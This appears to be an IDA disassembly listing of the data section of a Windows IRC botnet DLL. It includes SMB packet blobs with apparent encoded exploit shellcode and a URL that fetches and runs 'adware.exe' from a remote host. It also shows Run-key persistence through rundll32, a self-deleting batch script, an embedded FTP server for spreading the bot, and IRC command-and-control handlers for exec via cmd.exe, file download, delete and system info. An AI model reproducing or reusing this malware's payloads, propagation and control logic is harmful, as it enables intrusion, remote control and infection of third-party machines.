db 3Ah
dd 424D53FFh, 75h, 20011800h, 3 dup(0)
dd 1D300000h, 0EC840800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
; char byte_100110D8[]
byte_100110D8 db 3 dup(0) ; DATA XREF: sub_10003D60+1CD�o
db 5Ch
dd 424D53FFh, 0A2h, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 0FF18h, 80000h, 16h, 0
dd 2019Fh, 3 dup(0)
dd 7, 1, 40h, 2, 5C000900h, 574F5242h, 524553h
; char byte_10011138[]
byte_10011138 db 3 dup(0) ; DATA XREF: sub_10003D60+204�o
db 92h
dd 424D53FFh, 25h, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 48000010h, 0E0040000h, 0FFh
dd 2 dup(0)
dd 48004A00h, 2004A00h, 2600h, 5C004F40h, 45504950h, 5005Ch
dd 10030Bh, 480000h, 0
dd 16D00000h, 16D0h, 10000h, 0
dd 4FC80001h, 16704B32h, 781201D3h, 6EBF475Ah, 388E1h
dd 5D040000h, 1CEB8A88h, 0E89F11C9h, 102B0008h, 26048h
dd 0
; char byte_100111D0[]
byte_100111D0 db 2 dup(0) ; DATA XREF: sub_10003D60+23B�o
dw 5701h
dd 424D53FFh, 2Fh, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 0FF0Eh, 400000h, 0FF000000h
dd 8FFFFFFh, 11800h, 3F011800h, 0
dd 5011800h, 10010000h, 18000000h, 1, 0
dd 1, 1C001F00h, 118C467h, 0
dd 1000000h, 0
dd 6334BF00h, 1, 63000000h, 93000001h, 0FC489648h, 0F9989340h
dd 969F9F98h, 40902737h, 0D64E4B9Fh, 83C92B93h, 0EED9AFE9h
dd 0F42474D9h, 1373815Bh, 0E9D82A2Dh, 0E2FCEB83h, 27EEACF4h
dd 9CD5D206h, 95C14715h, 27D5D401h, 0B4A14D16h, 9DA109CDh
dd 0DD56A6D5h, 53C52C91h, 87A135A6h, 91C12CC9h, 0D9A11962h
dd 41EA1C07h, 0ACEAA945h, 0D5E0ECEEh, 2CC1EFE8h, 0F00E79D2h
dd 87A1C89Ch, 0BEC12CCDh, 53612162h, 332B31B6h, 51A101EAh
dd 0B9360985h, 0BCF11C2Ah, 531A6E62h, 0A8A121A9h, 98A180F5h
dd 564273E1h, 88C623A7h, 8B4CFB16h, 0EA19458Fh, 0EA595A81h
dd 8D579B6h, 24C7E681h, 0ED57DD2h, 0BECFA4B6h, 0DA22C068h
dd 272847BCh, 0D1F34539h, 277D801Ch, 8B797E3Fh, 8B697EBAh
dd 8D57EAAh, 0E9FE458Fh, 39A37E8Fh, 8E457Ch
; char byte_1001132C[]
byte_1001132C db 2 dup(0) ; DATA XREF: sub_10003D60+272�o
dw 5701h
dd 424D53FFh, 2Fh, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 0FF0Eh, 18400000h, 0FF000001h
dd 8FFFFFFh, 11800h, 3F011800h, 0
dd 5011800h, 10000000h, 18000000h, 1, 0
db 1
align 4
db 0
db 1Fh, 0, 0C2h
db 99h ; ™
db 0EAh, 7Dh, 27h
db 3Fh ; ?
db 47h, 3Ah, 89h
db 0BCh ; ¼
db 0D2h, 0FAh, 0B0h
db 4Dh ; M
db 80h, 4, 31h
db 0BEh ; ¾
db 0D2h, 0FCh, 8Bh
db 0BCh ; ¼
db 0D2h, 0FAh, 0B0h
db 0Ch
db 64h, 0ACh, 91h
db 0BEh ; ¾
db 0D2h, 0FCh, 88h
db 0BDh ; ½
db 79h, 7Fh, 27h
db 39h ; 9
db 0BEh, 42h, 3Fh
db 90h ;
db 0EBh, 53h, 8Fh
db 16h
db 0FBh, 7Fh, 27h
db 39h ; 9
db 4Bh, 40h, 0BCh
db 8Fh ;
db 45h, 49h, 0B5h
db 60h ; `
db 0C8h, 40h, 88h
db 0B0h ; °
db 4, 0E6h, 51h
db 0Eh
db 47h, 6Eh, 51h
db 0Bh
db 1Ch, 0EAh, 2Bh
db 43h ; C
db 0D3h, 68h, 0F5h
db 17h
db 6Fh, 6, 4Bh
db 64h ; d
db 57h, 12h, 73h
db 42h ; B
db 86h, 42h, 0AAh
db 17h
db 9Eh, 3Ch, 27h
db 9Ch ; œ
db 69h, 0D5h, 0Eh
db 0B2h ; ²
db 7Ah, 78h, 89h
db 0B8h ; ¸
db 7Ch, 40h, 0D9h
db 0B8h ; ¸
db 7Ch, 7Fh, 89h
db 16h
db 0FDh, 42h, 75h
db 30h ; 0
db 28h, 0E4h, 8Bh
db 16h
db 0FBh, 40h, 27h
db 16h
db 1Ah, 0D5h, 8
db 62h ; b
db 7Ah, 0D6h, 5Bh
db 2Dh ; -
db 49h, 0D5h, 0Eh
db 0BBh ; »
db 0D2h, 0FAh, 0B0h
db 6
db 0E3h, 0CAh, 0B8h
db 0BAh ; º
db 0D2h, 0FCh, 27h
a9arz4tfled8ojd db '9arZ4TFLED8OjD3AICISR7A14gfpAGAI4Mvub1yWTdTZoEnGqgR1fEZmAq9LLzHoP'
db 'tLGaj0Uihzzki3Lp4GSJTt9X3xCgTtXw2wBRMWp6u83Rfy',0
; char byte_10011488[]
byte_10011488 db 2 dup(0) ; DATA XREF: sub_10003D60+2A9�o
dw 5701h
dd 424D53FFh, 2Fh, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 0FF0Eh, 30400000h, 0FF000002h
dd 8FFFFFFh, 11800h, 3F011800h, 0
dd 5011800h, 10000000h, 18000000h, 1, 0
dd 1, 52001F00h, 4E373636h, 76486F54h, 68633251h, 43683667h
dd 4B465439h, 57567967h, 42394553h, 574F654Ah, 396B4273h
dd 56317652h, 70426E42h, 58464275h, 62464835h, 336D784Ah
dd 30345053h, 6C46767Ah, 6A37544Fh, 5459454Ah, 3662696Fh
dd 326A5765h, 65316344h, 5559364Bh, 78383233h, 7542645Ah
dd 70527956h, 45473336h, 3672317Ah, 70355051h, 3159584Fh
dd 70393275h, 6A415074h, 787A6534h, 0A595069h, 4A000208h
dd 396C5752h, 4387750h, 32000208h, 56494937h, 68556F6Dh
dd 41516956h, 474C4335h, 30454F6Bh, 30523651h, 7874646Fh
dd 4703265h, 35000208h, 78327879h, 4353870h, 51000208h
dd 4A363967h, 56726571h, 53584755h, 614F5958h, 62477A61h
dd 73615648h, 344B4D33h, 793942h, 78F9BF00h, 1000000h
dd 0
dd 1000000h, 0
dd 7BEEB400h, 0
; char byte_100115E4[]
byte_100115E4 db 3 dup(0) ; DATA XREF: sub_10003D60+2DD�o
db 66h
dd 424D53FFh, 25h, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 1C000010h, 0E0040000h, 0FFh
dd 2 dup(0)
dd 1C004A00h, 2004A00h, 2600h, 5C002340h, 45504950h, 5005Ch
dd 100200h, 1C0000h, 0
dd 40000h, 0
dd 1Fh, 0
; char byte_10011650[]
byte_10011650 db 2 dup(0) ; DATA XREF: sub_10003D60+314�o
dw 5701h
dd 424D53FFh, 2Fh, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 0FF0Eh, 400000h, 0FF000000h
dd 8FFFFFFh, 11800h, 3F011800h, 0
dd 5011800h, 10010000h, 18000000h, 1, 0
dd 1, 1C001F00h, 118C467h, 0
dd 1000000h, 0
dd 6334BF00h, 1, 63000000h, 93000001h, 0FC489648h, 0F9989340h
dd 969F9F98h, 40902737h, 0D64E4B9Fh, 83C92B93h, 0EED9AFE9h
dd 0F42474D9h, 1373815Bh, 0E9D82A2Dh, 0E2FCEB83h, 27EEACF4h
dd 9CD5D206h, 95C14715h, 27D5D401h, 0B4A14D16h, 9DA109CDh
dd 0DD56A6D5h, 53C52C91h, 87A135A6h, 91C12CC9h, 0D9A11962h
dd 41EA1C07h, 0ACEAA945h, 0D5E0ECEEh, 2CC1EFE8h, 0F00E79D2h
dd 87A1C89Ch, 0BEC12CCDh, 53612162h, 332B31B6h, 51A101EAh
dd 0B9360985h, 0BCF11C2Ah, 531A6E62h, 0A8A121A9h, 98A180F5h
dd 564273E1h, 88C623A7h, 8B4CFB16h, 0EA19458Fh, 0EA595A81h
dd 8D579B6h, 24C7E681h, 0ED57DD2h, 0BECFA4B6h, 0DA22C068h
dd 272847BCh, 0D1F34539h, 277D801Ch, 8B797E3Fh, 8B697EBAh
dd 8D57EAAh, 0E9FE458Fh, 39A37E8Fh, 8E457Ch
; char byte_100117AC[]
byte_100117AC db 2 dup(0) ; DATA XREF: sub_10003D60+34B�o
dw 5701h
dd 424D53FFh, 2Fh, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 0FF0Eh, 18400000h, 0FF000001h
dd 8FFFFFFh, 11800h, 3F011800h, 0
dd 5011800h, 10000000h, 18000000h, 1, 0
db 1
align 4
db 0
db 1Fh, 0, 0C2h
db 99h ; ™
db 0EAh, 7Dh, 27h
db 3Fh ; ?
db 47h, 3Ah, 89h
db 0BCh ; ¼
db 0D2h, 0FAh, 0B0h
db 4Dh ; M
db 80h, 4, 31h
db 0BEh ; ¾
db 0D2h, 0FCh, 8Bh
db 0BCh ; ¼
db 0D2h, 0FAh, 0B0h
db 0Ch
db 64h, 0ACh, 91h
db 0BEh ; ¾
db 0D2h, 0FCh, 88h
db 0BDh ; ½
db 79h, 7Fh, 27h
db 39h ; 9
db 0BEh, 42h, 3Fh
db 90h ;
db 0EBh, 53h, 8Fh
db 16h
db 0FBh, 7Fh, 27h
db 39h ; 9
db 4Bh, 40h, 0BCh
db 8Fh ;
db 45h, 49h, 0B5h
db 60h ; `
db 0C8h, 40h, 88h
db 0B0h ; °
db 4, 0E6h, 51h
db 0Eh
db 47h, 6Eh, 51h
db 0Bh
db 1Ch, 0EAh, 2Bh
db 43h ; C
db 0D3h, 68h, 0F5h
db 17h
db 6Fh, 6, 4Bh
db 64h ; d
db 57h, 12h, 73h
db 42h ; B
db 86h, 42h, 0AAh
db 17h
db 9Eh, 3Ch, 27h
db 9Ch ; œ
db 69h, 0D5h, 0Eh
db 0B2h ; ²
db 7Ah, 78h, 89h
db 0B8h ; ¸
db 7Ch, 40h, 0D9h
db 0B8h ; ¸
db 7Ch, 7Fh, 89h
db 16h
db 0FDh, 42h, 75h
db 30h ; 0
db 28h, 0E4h, 8Bh
db 16h
db 0FBh, 40h, 27h
db 16h
db 1Ah, 0D5h, 8
db 62h ; b
db 7Ah, 0D6h, 5Bh
db 2Dh ; -
db 49h, 0D5h, 0Eh
db 0BBh ; »
db 0D2h, 0FAh, 0B0h
db 6
db 0E3h, 0CAh, 0B8h
db 0BAh ; º
db 0D2h, 0FCh, 27h
a9arz4tfled8o_0 db '9arZ4TFLED8OjD3AICISR7A14gfpAGAI4Mvub1yWTdTZoEnGqgR1fEZmAq9LLzHoP'
db 'tLGaj0Uihzzki3Lp4GSJTt9X3xCgTtXw2wBRMWp6u83Rfy',0
; char byte_10011908[]
byte_10011908 db 2 dup(0) ; DATA XREF: sub_10003D60+382�o
dw 5701h
dd 424D53FFh, 2Fh, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 0FF0Eh, 30400000h, 0FF000002h
dd 8FFFFFFh, 11800h, 3F011800h, 0
dd 5011800h, 10000000h, 18000000h, 1, 0
dd 1, 52001F00h, 4E373636h, 76486F54h, 68633251h, 43683667h
dd 4B465439h, 57567967h, 42394553h, 574F654Ah, 396B4273h
dd 56317652h, 70426E42h, 58464275h, 62464835h, 336D784Ah
dd 30345053h, 6C46767Ah, 6A37544Fh, 5459454Ah, 3662696Fh
dd 326A5765h, 65316344h, 5559364Bh, 78383233h, 7542645Ah
dd 70527956h, 45473336h, 3672317Ah, 70355051h, 3159584Fh
dd 70393275h, 6A415074h, 787A6534h, 0A595069h, 4A000208h
dd 396C5752h, 4387750h, 32000208h, 56494937h, 68556F6Dh
dd 41516956h, 474C4335h, 30454F6Bh, 30523651h, 7874646Fh
dd 4703265h, 35000208h, 78327879h, 4353870h, 51000208h
dd 4A363967h, 56726571h, 53584755h, 614F5958h, 62477A61h
dd 73615648h, 344B4D33h, 793942h, 78F9BF00h, 1000000h
dd 0
dd 1000000h, 0
dd 7BEEB400h, 0
; char byte_10011A64[]
byte_10011A64 db 3 dup(0) ; DATA XREF: sub_10003D60+3B6�o
db 66h
dd 424D53FFh, 25h, 20011800h, 3 dup(0)
dd 1D300800h, 0EC840800h, 1C000010h, 0E0040000h, 0FFh
dd 2 dup(0)
dd 1C004A00h, 2004A00h, 2600h, 5C002340h, 45504950h, 5005Ch
dd 100200h, 1C0000h, 0
dd 40000h, 0
dd 1Fh, 0
unk_10011AD0 db 11h ; DATA XREF: sub_1000504C+9�o
aTvPw99qW db 'Tv}}pw~9[`9q(}}*w',0
align 4
dd 1Bh dup(0)
aWebreader db 'WebReader',0 ; DATA XREF: start+2D�o
align 4
aHttpAdware_rxm db 'http://adware.rxmods.net/adware.exe',0 ; DATA XREF: start+43�o
; char Mode[]
Mode db 'wb',0 ; DATA XREF: start+58�o
align 4
; char aCAdware_exe[]
aCAdware_exe db 'c:\adware.exe',0 ; DATA XREF: start+5D�o
align 4
; char File[]
File db 'c:\adware.exe',0 ; DATA XREF: start+D3�o
align 4
; char Operation[]
Operation db 'open',0 ; DATA XREF: start+D8�o
align 4
; char aSS_2[]
aSS_2 db '%s%s',0 ; DATA XREF: start+2B4�o
align 4
a95 db '95',0 ; DATA XREF: sub_10004987+7C�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_10004987+8E�o
align 4
a98 db '98',0 ; DATA XREF: sub_10004987+A9�o
align 10h
aMe db 'ME',0 ; DATA XREF: sub_10004987+C4�o
align 4
a2000 db '2000',0 ; DATA XREF: sub_10004987+DF�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_10004987+FA�o
align 10h
a??? db '???',0 ; DATA XREF: sub_10004987:loc_10004A8A�o
; char aSS_3[]
aSS_3 db '%s (%s)',0 ; DATA XREF: sub_10004987+129�o
; char aOsWindowsSD_DD[]
aOsWindowsSD_DD db 'OS: Windows %s (%d.%d - %d), CPU: %dMHz, RAM: %d/%dMB free, box: '
; DATA XREF: sub_10004987+210�o
db '%s, user: %s, sysdir: %s, uptime: %lud %luh %lum',0
align 10h
; char aIpSConnectedFr[]
aIpSConnectedFr db 'IP: %s, connected from: %s (%s)',0 ; DATA XREF: sub_10004BB5+24�o
; char aD_D_D_D[]
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_10004BF7+16�o
; char aD_D_D_D_0[]
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_10004C83+48�o
; char aSS_4[]
aSS_4 db '%s\%s',0 ; DATA XREF: sub_10004CE4+27�o
align 10h
; char aSStart[]
aSStart db '%s,start',0 ; DATA XREF: sub_10004CE4+8D�o
align 4
; char aRundll32_exe[]
aRundll32_exe db 'rundll32.exe',0 ; DATA XREF: sub_10004CE4+B2�o
align 4
; char aOpen_0[]
aOpen_0 db 'open',0 ; DATA XREF: sub_10004CE4+B7�o
align 4
; char aWindllS[]
aWindllS db 'WinDLL (%s)',0 ; DATA XREF: sub_10004DB1+20�o
; char aSS_5[]
aSS_5 db '%s\%s',0 ; DATA XREF: sub_10004DB1+46�o
align 4
; char aRundll32_exeSS[]
aRundll32_exeSS db 'rundll32.exe %s,start',0 ; DATA XREF: sub_10004DB1+67�o
align 10h
; char SubKey[]
SubKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_10004DB1+97�o
align 10h
; char aSS_6[]
aSS_6 db '%s\%s',0 ; DATA XREF: sub_10004EA7+39�o
align 4
; char aSuninstall_bat[]
aSuninstall_bat db '%suninstall.bat',0 ; DATA XREF: sub_10004EA7+5A�o
; char aWindllS_0[]
aWindllS_0 db 'WinDLL (%s)',0 ; DATA XREF: sub_10004EA7+92�o
; char aSoftwareMicr_0[]
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_10004EA7+C2�o
align 4
; char a[]
a@echoOff1DelSI db '@echo off',0Dh,0Ah ; DATA XREF: sub_10004EA7+109�o
db ':1',0Dh,0Ah
db 'del "%s"',0Dh,0Ah
db 'if exist "%s" goto 1',0Dh,0Ah
db 'del "%s"',0Dh,0Ah,0
align 10h
; char aOpen_1[]
aOpen_1 db 'open',0 ; DATA XREF: sub_10004EA7+18C�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_10005380+30�o
align 4
; char aOpen_2[]
aOpen_2 db 'open',0 ; DATA XREF: sub_10005380+156�o
align 4
; char aSStart_0[]
aSStart_0 db '%s,start',0 ; DATA XREF: sub_10005380+16C�o
align 4
; char aRundll32_exe_0[]
aRundll32_exe_0 db 'rundll32.exe',0 ; DATA XREF: sub_10005380+191�o
align 4
; char aOpen_3[]
aOpen_3 db 'open',0 ; DATA XREF: sub_10005380+196�o
align 10h
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_10005380:loc_10005523�o
align 4
; char aOpen_4[]
aOpen_4 db 'open',0 ; DATA XREF: sub_10005380+1D1�o
align 10h
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_10005584+30�o
align 4
aSpeed_test db 'speed.test',0 ; DATA XREF: sub_10005584+110�o
align 4
; char aSpeedtestCompl[]
aSpeedtestCompl db 'speedtest complete (upload speed: %luKB/s)',0
; DATA XREF: sub_10005584+202�o
align 4
aTemp db 'Temp',0 ; DATA XREF: .text:1000594F�o
align 4
aHttpWww_whatis db 'http://www.whatismyip.org',0
align 4
aMainExternalIp db 'Main-> External IP: %s',0 ; DATA XREF: .text:100059BB�o
align 10h
a220WelcomeToFt db '220 Welcome to FTPd',0Ah,0 ; DATA XREF: sub_10005C3D+2E5�o
align 4
; char cp[]
cp db '61.251.128.0',0 ; DATA XREF: sub_10005C3D+302�o
align 4
; char a61_251_128_255[]
a61_251_128_255 db '61.251.128.255',0 ; DATA XREF: sub_10005C3D+327�o
align 4
; char a210_93_224_0[]
a210_93_224_0 db '210.93.224.0',0 ; DATA XREF: sub_10005C3D+351�o
align 4
; char a210_93_224_255[]
a210_93_224_255 db '210.93.224.255',0 ; DATA XREF: sub_10005C3D+376�o
align 4
; char aSS_7[]
aSS_7 db '%s %s',0 ; DATA XREF: sub_10005C3D+540�o
align 10h
; char Str1[]
Str1 db 'USER',0 ; DATA XREF: sub_10005C3D+55C�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_10005C3D+572�o
align 10h
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_10005C3D+5B4�o
align 4
a230UserLoggedI db '230 User logged in',0Ah,0 ; DATA XREF: sub_10005C3D+5CA�o
; char aSyst[]
aSyst db 'SYST',0 ; DATA XREF: sub_10005C3D+609�o
align 4
dword_10011F34 dd 20353132h ; DATA XREF: sub_10005C3D+61A�r
dword_10011F38 dd 64505446h ; DATA XREF: sub_10005C3D+626�r
word_10011F3C dw 0Ah ; DATA XREF: sub_10005C3D+632�r
align 10h
; char aRest[]
aRest db 'REST',0 ; DATA XREF: sub_10005C3D+671�o
align 4
dword_10011F48 dd 20303533h ; DATA XREF: sub_10005C3D+682�r
dword_10011F4C dd 74736552h ; DATA XREF: sub_10005C3D+68E�r
dword_10011F50 dd 69747261h ; DATA XREF: sub_10005C3D+699�r
dword_10011F54 dd 0A676Eh ; DATA XREF: sub_10005C3D+6A5�r
; char aPwd[]
aPwd db 'PWD',0 ; DATA XREF: sub_10005C3D+6E3�o
a257IsCurrentDi db '257 "/" is current directory',0Ah,0 ; DATA XREF: sub_10005C3D+6F9�o
align 4
; char aType[]
aType db 'TYPE',0 ; DATA XREF: sub_10005C3D+73A�o
align 4
; char aA[]
aA: ; DATA XREF: sub_10005C3D+756�o
unicode 0, <A>,0
dword_10011F88 dd 20303032h ; DATA XREF: sub_10005C3D+767�r
dword_10011F8C dd 65707954h ; DATA XREF: sub_10005C3D+772�r
dword_10011F90 dd 74657320h ; DATA XREF: sub_10005C3D+77E�r
dword_10011F94 dd 206F7420h ; DATA XREF: sub_10005C3D+78A�r
word_10011F98 dw 0A41h ; DATA XREF: sub_10005C3D+795�r
byte_10011F9A db 0 ; DATA XREF: sub_10005C3D+7A3�r
align 4
; char aType_0[]
aType_0 db 'TYPE',0 ; DATA XREF: sub_10005C3D+7E1�o
align 4
; char aI[]
aI: ; DATA XREF: sub_10005C3D+7FD�o
unicode 0, <I>,0
dword_10011FA8 dd 20303032h ; DATA XREF: sub_10005C3D+80E�r
dword_10011FAC dd 65707954h ; DATA XREF: sub_10005C3D+81A�r
dword_10011FB0 dd 74657320h ; DATA XREF: sub_10005C3D+825�r
dword_10011FB4 dd 206F7420h ; DATA XREF: sub_10005C3D+831�r
word_10011FB8 dw 0A49h ; DATA XREF: sub_10005C3D+83D�r
byte_10011FBA db 0 ; DATA XREF: sub_10005C3D+84A�r
align 4
; char aPasv[]
aPasv db 'PASV',0 ; DATA XREF: sub_10005C3D+888�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_10005C3D+89E�o
align 10h
; char aList[]
aList db 'LIST',0 ; DATA XREF: sub_10005C3D+8DF�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_10005C3D+8F5�o
align 10h
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_10005C3D+937�o
align 4
a200PortCommand db '200 PORT command successful',0Ah,0 ; DATA XREF: sub_10005C3D+951�o
align 4
; char aS_0[]
aS_0 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah
; DATA XREF: sub_10005C3D+989�o
db ']',0
; char aXX[]
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_10005C3D+9EB�o
align 4
; char aS_S_S_S[]
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_10005C3D+A38�o
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_10005C3D+A81�o
align 4
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_10005C3D+A9B�o
align 4
a226TransferC_0 db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_10005C3D+AAE�o
align 10h
a425CanTOpenDat db '425 Can',27h,'t open data connection',0Ah,0
; DATA XREF: sub_10005C3D+AC3�o
; char aFtpTransferCom[]
aFtpTransferCom db 'ftp transfer complete to %s',0 ; DATA XREF: sub_10005C3D+B6A�o
; char aQuit_0[]
aQuit_0 db 'QUIT',0 ; DATA XREF: sub_10005C3D+BAD�o
align 4
dword_10012104 dd 20313232h ; DATA XREF: sub_10005C3D+BBE�r
dword_10012108 dd 646F6F47h ; DATA XREF: sub_10005C3D+BCA�r
dword_1001210C dd 0A657962h ; DATA XREF: sub_10005C3D+BD6�r
byte_10012110 db 0 ; DATA XREF: sub_10005C3D+BE1�r
align 4
dd 1
dword_10012118 dd 57524D54h ; DATA XREF: sub_10007005+9�r
dword_1001211C dd 6B726Fh ; DATA XREF: sub_10007005+11�r
dword_10012120 dd 3539h ; DATA XREF: sub_10007005+63�o
dword_10012124 dd 544Eh ; DATA XREF: sub_10007005+73�o
dword_10012128 dd 3839h ; DATA XREF: sub_10007005+91�o
dword_1001212C dd 454Dh ; DATA XREF: sub_10007005+AC�o
dword_10012130 dd 4B32h ; DATA XREF: sub_10007005+C7�o
dword_10012134 dd 5058h ; DATA XREF: sub_10007005+E2�o
dword_10012138 dd 334B32h ; DATA XREF: sub_10007005+FD�o
dword_1001213C dd 3F3F3Fh ; DATA XREF: sub_10007005:loc_1000710B�o
; char aUserSS[]
aUserSS db 'USER %s "" "" :%s',0 ; DATA XREF: sub_10007005+240�o
align 4
; char aNickSSS[]
aNickSSS db 'NICK |%s%s%s',0 ; DATA XREF: sub_10007005+259�o
align 4
; char aPassS[]
aPassS db 'PASS %s',0 ; DATA XREF: sub_10007005+276�o
; char asc_1001216C[]
asc_1001216C db 0Dh,0Ah,0 ; DATA XREF: sub_10007293+32�o
align 10h
; char aPrivmsgSS[]
aPrivmsgSS db 'PRIVMSG %s :%s',0 ; DATA XREF: sub_10007303+3D�o
align 10h
; char asc_10012180[]
asc_10012180 db 0Dh,0Ah,0 ; DATA XREF: sub_10007303+57�o
align 4
; char aPing[]
aPing db 'PING',0 ; DATA XREF: sub_10007424+12D�o
align 4
; char aPongS[]
aPongS db 'PONG %s',0 ; DATA XREF: sub_10007424+143�o
; char a001[]
a001 db '001',0 ; DATA XREF: sub_10007424+168�o
; char aUserhostS[]
aUserhostS db 'USERHOST %s',0 ; DATA XREF: sub_10007424+193�o
; char aJoinSS[]
aJoinSS db 'JOIN %s %s',0 ; DATA XREF: sub_10007424+1AA�o
align 10h
; char a302[]
a302 db '302',0 ; DATA XREF: sub_10007424+1C0�o
; char a433[]
a433 db '433',0 ; DATA XREF: sub_10007424+31E�o
; char aNickS[]
aNickS db 'NICK %s',0 ; DATA XREF: sub_10007424+336�o
; char aNick[]
aNick db 'NICK',0 ; DATA XREF: sub_10007424+34C�o
align 4
; char aKick[]
aKick db 'KICK',0 ; DATA XREF: sub_10007424+3A7�o
align 10h
; char aJoinSS_0[]
aJoinSS_0 db 'JOIN %s %s',0 ; DATA XREF: sub_10007424+3EE�o
align 4
; char aPrivmsg[]
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_10007424+404�o
; char a332[]
a332 db '332',0 ; DATA XREF: sub_10007424+41A�o
; char aPrivmsg_0[]
aPrivmsg_0 db 'PRIVMSG',0 ; DATA XREF: sub_10007424+434�o
; char aSPrivmsgSS[]
aSPrivmsgSS db ':%s PRIVMSG %s :%s',0 ; DATA XREF: sub_10007424+5A6�o
align 4
; char a332_0[]
a332_0 db '332',0 ; DATA XREF: sub_10007424+5DA�o
; char aS332SSS[]
aS332SSS db ':%s 332 %s %s :%s',0 ; DATA XREF: sub_10007424+6FD�o
align 4
a@fbi_gov db '*@fbi.gov',0 ; DATA XREF: sub_10007424+739�o
align 4
; char a332_1[]
a332_1 db '332',0 ; DATA XREF: sub_10007424+74E�o
; char aBotid[]
aBotid db 'botid',0 ; DATA XREF: sub_10007424+770�o
align 4
; char aBotidS___[]
aBotidS___ db '{BOTID}: %s...',0 ; DATA XREF: sub_10007424+787�o
align 4
; char aUptime[]
aUptime db 'uptime',0 ; DATA XREF: sub_10007424+7AB�o
align 4
; char aUptimeLudLuhLu[]
aUptimeLudLuhLu db '{UPTIME}: %lud %luh %lum...',0 ; DATA XREF: sub_10007424+874�o
; char aSysinfo[]
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_10007424+898�o
; char aSysinfoS___[]
aSysinfoS___ db '{SYSINFO}: %s...',0 ; DATA XREF: sub_10007424+8B0�o
align 4
; char aNetinfo[]
aNetinfo db 'netinfo',0 ; DATA XREF: sub_10007424+8D4�o
; char aNetinfoS___[]
aNetinfoS___ db '{NETINFO}: %s...',0 ; DATA XREF: sub_10007424+8EC�o
align 10h
; char aReconnect[]
aReconnect db 'reconnect',0 ; DATA XREF: sub_10007424+910�o
align 4
; char aQuit_1[]
aQuit_1 db 'QUIT',0 ; DATA XREF: sub_10007424+922�o
align 4
; char aExit[]
aExit db 'exit',0 ; DATA XREF: sub_10007424+93F�o
align 4
; char aQuit_2[]
aQuit_2 db 'QUIT',0 ; DATA XREF: sub_10007424+956�o
align 4
; char aRemove[]
aRemove db 'remove',0 ; DATA XREF: sub_10007424+976�o
align 4
; char aQuit_3[]
aQuit_3 db 'QUIT',0 ; DATA XREF: sub_10007424+9BB�o
align 4
; char aRaw[]
aRaw db 'raw',0 ; DATA XREF: sub_10007424+9DD�o
; char aS_1[]
aS_1 db ' %s',0 ; DATA XREF: sub_10007424+A10�o
; char aRawS___[]
aRawS___ db '{RAW}: %s...',0 ; DATA XREF: sub_10007424+AA8�o
align 4
; char aOpen_5[]
aOpen_5 db 'open',0 ; DATA XREF: sub_10007424+AC5�o
align 4
; char aS_2[]
aS_2 db ' %s',0 ; DATA XREF: sub_10007424+AF8�o
; char aOpen_6[]
aOpen_6 db 'open',0 ; DATA XREF: sub_10007424+B96�o
align 10h
; char aOpenOpenedFile[]
aOpenOpenedFile db '{OPEN}: Opened file %s...',0 ; DATA XREF: sub_10007424+BAA�o
align 4
; char aExec[]
aExec db 'exec',0 ; DATA XREF: sub_10007424+BCE�o
align 4
; char aS_3[]
aS_3 db ' %s',0 ; DATA XREF: sub_10007424+C01�o
; char aCS[]
aCS db '/C %s',0 ; DATA XREF: sub_10007424+C7D�o
align 10h
; char aCmd_exe[]
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_10007424+CA2�o
; char aOpen_7[]
aOpen_7 db 'open',0 ; DATA XREF: sub_10007424+CA7�o
align 10h
; char aExecuteExecute[]
aExecuteExecute db '{EXECUTE}: Executed file %s...',0 ; DATA XREF: sub_10007424+CBB�o
align 10h
; char aDelete[]
aDelete db 'delete',0 ; DATA XREF: sub_10007424+CDF�o
align 4
; char aS_4[]
aS_4 db ' %s',0 ; DATA XREF: sub_10007424+D12�o
; char aDeletedFileS__[]
aDeletedFileS__ db '{DELETED}: FILE %s...',0 ; DATA XREF: sub_10007424+DAE�o
align 4
; char aSpeedtest[]
aSpeedtest db 'speedtest',0 ; DATA XREF: sub_10007424+DDF�o
align 10h
; char aSpeedtest_0[]
aSpeedtest_0 db 'speedtest',0 ; DATA XREF: sub_10007424+E94�o
align 4
; char aDownlow[]
aDownlow db 'downlow',0 ; DATA XREF: sub_10007424+F30�o
; char aDownloadingDow[]
aDownloadingDow db '{DOWNLOADING}: Downloading file...',0 ; DATA XREF: sub_10007424+FC8�o
align 4
; char aDownload[]
aDownload db 'download',0 ; DATA XREF: sub_10007424+FE3�o
align 4
; char aIcmp[]
